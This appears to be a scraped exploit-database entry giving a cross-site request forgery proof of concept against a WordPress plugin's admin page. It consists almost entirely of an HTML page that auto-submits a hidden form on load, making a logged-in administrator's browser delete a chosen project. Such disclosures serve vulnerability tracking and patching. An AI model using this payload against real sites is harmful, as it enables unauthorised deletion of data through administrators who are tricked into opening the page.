## https://sploitus.com/exploit?id=WPEX-ID:D4980886-DA10-4BBC-A84A-FE071AB3B755
Make a logged in admin open an HTML file containing (where `<<ID>>` is a valid ID):
```
<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
<input type="hidden" name="action" value="delete-project">
<input type="hidden" name="id" value="<<ID>>">
</form>
</body>
```